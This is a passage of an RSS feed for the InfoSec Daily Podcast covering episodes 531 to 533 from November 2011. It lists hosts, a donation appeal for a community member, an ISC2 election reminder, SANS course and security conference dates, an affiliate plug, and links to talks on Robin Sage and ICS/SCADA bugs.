	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: </span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have an interesting discussion with Thomas Ryan. &nbsp;Thomas is the creator of Robin Sage (http://en.wikipedia.org/wiki/Robin_Sage).&nbsp; <br />
	</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-533-interview-with-thomas-ryan/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3211/0/infosec-daily-podcast-episode-533.mp3" length="26072230" type="audio/mpeg" />
		<itunes:duration>0:54:16</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 533 for November 29, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: 
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	We have an interesting discussion with Thomas Ryan. &#160;Thomas is the creator of Robin Sage (http://en.wikipedia.org/wiki/Robin_Sage).&#160; 
	</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 532 &#8211; Live from SecurityZone 2011</title>
		<link>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011</link>
		<comments>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011#comments</comments>
		<pubDate>Tue, 29 Nov 2011 02:24:11 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3205</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 532 for November 28, 2011. &nbsp;Tonight&#39;s podcast is hosted by </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Vote For Wim Remes &amp; Dan Houser (@1cissp on twitter)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 16, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: ISC2</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-532-live-from-securityzone-2011/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3205/0/infosec-daily-podcast-episode-532.mp3" length="20163540" type="audio/mpeg" />
		<itunes:duration>0:41:57</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and lov[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 532 for November 28, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Karthik Rangarajan, and Varun Sharma.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes &#38; Dan Houser (@1cissp on twitter)
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 531 &#8211; Weekend Wrap-up with Dr. Bonez</title>
		<link>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez</link>
		<comments>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez#comments</comments>
		<pubDate>Sat, 26 Nov 2011 18:44:07 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3198</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik. Guests: Gambit, Terry McCorkle, and Billy Rios. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he [...]]]></description>
			<content:encoded><![CDATA[<p><span>InfoSec Daily Podcast Episode 531 for November 26, 2011. &nbsp;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.</span></p>
<div style="background-color: transparent">
	<span>Guests: Gambit, Terry McCorkle, and Billy Rios.</span></p>
<p>	<span>Announcements:</span><br />
	<span>Brad Smith (theNurse)</span><br />
	<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span>Vote For Wim Remes</span><br />
	<span>When: Starts November 16, 2011</span><br />
	<span>Where: ISC2</span><br />
	<span>Who: CISSP&rsquo;s</span><br />
	<a href="http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html"><span>http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html</span></a></p>
<p>	<span>SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span>When: Starts November 30, 2011</span><br />
	<span>Where: Atlanta, GA</span><br />
	<span>Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>When: Starts January 24, 2012</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span>Where: Atlanta, GA</span></a><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span>http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span>ShmooCon 2012</span><br />
	<span>When: January 27th-29th, 2012</span><br />
	<span>Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span>http://www.shmoocon.org</span></a></p>
<p>	<span>DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span>When: &nbsp;September 27-30, 2012</span><br />
	<span>Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></p>
<p>	<span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span>Stories:</span><br />
	<span>Source:</span><span> </span></p>
<p>	<a href="http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software"><span>http://www.irongeek.com/i.php?page=videos/derbycon1/mccorkle-and-rios-100-bugs-in-100-days-an-analysis-of-ics-scada-software</span></a></div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-531-weekend-wrap-up-with-dr-bonez/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3198/0/infosec-daily-podcast-episode-531.mp3" length="20659686" type="audio/mpeg" />
		<itunes:duration>0:42:35</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.

	Guests: Gambit, Terry McCorkle, and Billy Rios.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smit[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 531 for November 26, 2011. &#160;Tonight&#39;s podcast is hosted by Dr. Bonez, and Boris Sverdlik.

	Guests: Gambit, Terry McCorkle, and Billy Rios.
	Announcements:
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Vote For Wim Remes
	When: Starts November 16, 2011
	Where: ISC2
	Who: CISSP&#8217;s
	http://blog.isc2.org/isc2_blog/2011/11/cast-your-vote-isc%C2%B2-board-of-directors-election-begins-nov-16-2011.html
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
